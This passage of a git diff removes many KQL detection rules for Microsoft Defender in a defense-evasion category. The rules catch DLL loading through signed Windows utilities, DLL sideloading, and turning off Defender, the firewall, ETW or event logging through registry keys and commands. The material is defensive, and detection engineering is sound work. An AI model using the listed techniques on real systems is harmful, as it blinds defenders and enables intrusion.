-// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql b/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql
deleted file mode 100644
index d3c89b0f..00000000
--- a/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: medium
-// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
-// Tags: attack.defense_evasion, attack.t1070
-DeviceImageLoadEvents
-| where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql b/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql
deleted file mode 100644
index 021c10fe..00000000
--- a/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
-// Tags: attack.defense_evasion, attack.t1218.003
-DeviceImageLoadEvents
-| where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql b/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql
deleted file mode 100644
index 7e67003a..00000000
--- a/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/10/23
-// Level: medium
-// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql b/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql
deleted file mode 100644
index 3e19a55a..00000000
--- a/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql b/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql
deleted file mode 100644
index 35b252a0..00000000
--- a/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Austin Songer
-// Date: 2021/07/22
-// Level: medium
-// Description: Detects when a user enables DNS-over-HTTPS.
-This can be used to hide internet activity or be used to hide the process of exfiltrating data.
-With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
-
-// Tags: attack.defense_evasion, attack.t1140, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql b/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql
deleted file mode 100644
index 08a09450..00000000
--- a/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2020/09/26
-// Level: low
-// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
-// Tags: attack.defense_evasion, attack.t1564.006, attack.t1564
-DeviceProcessEvents
-| where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm")
\ No newline at end of file
diff --git a/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql b/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
deleted file mode 100644
index 42c5fde8..00000000
--- a/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020/10/10
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/DeviceCredentialDeployment_Execution.kql b/Defense Evasion/DeviceCredentialDeployment_Execution.kql
deleted file mode 100644
index 9562d08b..00000000
--- a/Defense Evasion/DeviceCredentialDeployment_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\DeviceCredentialDeployment.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql b/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql
deleted file mode 100644
index 00125077..00000000
--- a/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community (rule), @_felamos (idea)
-// Date: 2019/10/12
-// Level: high
-// Description: The Devtoolslauncher.exe executes other binary
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql b/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql
deleted file mode 100644
index cbf97ca4..00000000
--- a/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Greg (rule)
-// Date: 2022/06/17
-// Level: high
-// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
-// Tags: attack.defense_evasion, attack.t1202, cve.2022.30190
-DeviceImageLoadEvents
-| where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Directory_Removal_Via_Rmdir.kql b/Defense Evasion/Directory_Removal_Via_Rmdir.kql
deleted file mode 100644
index 84822f3c..00000000
--- a/Defense Evasion/Directory_Removal_Via_Rmdir.kql	
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2022/01/15
-// Level: low
-// Description: Detects execution of the builtin "rmdir" command in order to delete directories.
-Adversaries may delete files left behind by the actions of their intrusion activity.
-Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql b/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql
deleted file mode 100644
index 2dafc2c6..00000000
--- a/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Services\\LanmanServer\\Parameters" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql
deleted file mode 100644
index 2be410f2..00000000
--- a/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: medium
-// Description: Detects disabling Windows Defender Exploit Guard Network Protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql b/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql
deleted file mode 100644
index bcf1f3ec..00000000
--- a/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql b/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql
deleted file mode 100644
index 98361323..00000000
--- a/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/25
-// Level: high
-// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\SOFTWARE" and RegistryKey contains "\\Microsoft\\Office" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql b/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql
deleted file mode 100644
index ae0316e9..00000000
--- a/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: medium
-// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Services\\SharedAccess\\Parameters\\FirewallPolicy" and RegistryKey endswith "\\EnableFirewall"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql
deleted file mode 100644
index 4c0fde0f..00000000
--- a/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: high
-// Description: Detects disabling Windows Defender PUA protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql b/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql
deleted file mode 100644
index 15e206f6..00000000
--- a/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/02
-// Level: medium
-// Description: Detects registry modifications that disable Privacy Settings Experience
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql
deleted file mode 100644
index d1499c8c..00000000
--- a/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: medium
-// Description: Detects disabling Windows Defender Tamper Protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql b/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql
deleted file mode 100644
index 179a8de2..00000000
--- a/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: ok @securonix invrep-de, oscd.community, frack113
-// Date: 2020/10/12
-// Level: high
-// Description: Detects attackers attempting to disable Windows Defender using Powershell
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql b/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql
deleted file mode 100644
index ec388f50..00000000
--- a/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
-// Date: 2022/08/01
-// Level: high
-// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows Defender" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\App and Browser protection\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\Real-Time Protection\\DisableBehaviorMonitoring" or RegistryKey endswith "\\Real-Time Protection\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\Real-Time Protection\\DisableIOAVProtection" or RegistryKey endswith "\\Real-Time Protection\\DisableOnAccessProtection" or RegistryKey endswith "\\Real-Time Protection\\DisableRealtimeMonitoring" or RegistryKey endswith "\\Real-Time Protection\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\Real-Time Protection\\DisableScriptScanning" or RegistryKey endswith "\\Reporting\\DisableEnhancedNotifications" or RegistryKey endswith "\\SpyNet\\DisableBlockAtFirstSeen")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql b/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql
deleted file mode 100644
index d51c9399..00000000
--- a/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/04
-// Level: high
-// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql b/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql
deleted file mode 100644
index 5a8e047e..00000000
--- a/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set EnableFirewall to 0 to disable the Windows firewall
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql b/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql
deleted file mode 100644
index 2e239422..00000000
--- a/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: high
-// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql b/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql
deleted file mode 100644
index 530809c4..00000000
--- a/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_of_ETW_Trace.kql b/Defense Evasion/Disable_of_ETW_Trace.kql
deleted file mode 100644
index 9ce3bb23..00000000
--- a/Defense Evasion/Disable_of_ETW_Trace.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/03/22
-// Level: high
-// Description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
-// Tags: attack.defense_evasion, attack.t1070, attack.t1562.006, car.2016-04-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11")
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_IE_Security_Features.kql b/Defense Evasion/Disabled_IE_Security_Features.kql
deleted file mode 100644
index a947916f..00000000
--- a/Defense Evasion/Disabled_IE_Security_Features.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/06/19
-// Level: high
-// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ")
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_Volume_Snapshots.kql b/Defense Evasion/Disabled_Volume_Snapshots.kql
deleted file mode 100644
index 4531559c..00000000
--- a/Defense Evasion/Disabled_Volume_Snapshots.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/28
-// Level: high
-// Description: Detects commands that temporarily turn off Volume Snapshots
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled"
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql b/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql
deleted file mode 100644
index a8f2a083..00000000
--- a/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
